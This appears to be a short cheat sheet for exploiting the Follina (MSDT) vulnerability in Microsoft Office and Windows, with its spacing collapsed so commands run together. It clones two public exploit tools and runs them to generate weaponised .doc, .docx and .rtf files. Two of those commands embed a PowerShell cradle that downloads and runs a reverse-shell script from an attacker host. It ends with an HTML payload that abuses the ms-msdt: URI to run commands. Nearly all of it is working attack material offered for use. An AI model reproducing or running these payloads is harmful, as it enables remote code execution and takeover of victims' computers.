## ------------------| JohnHammondgitclonehttps://github.com/JohnHammond/msdt-follinapython3follina.py-oexploit.doc-c"IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"## ------------------| chvancootengitclonegitclonehttps://github.com/chvancooten/follina.py## Execute a local binarypython3follina.py-tdocx-mbinary-b \windows\system32\calc.exe## On linux you may have to escape backslashespython3follina.py-trtf-mbinary-b \\windows\\system32\\calc.exe## RevShellpython3follina.py-trtf-mcommand-c"IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
Scheme
<!doctypehtml><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script></body></html>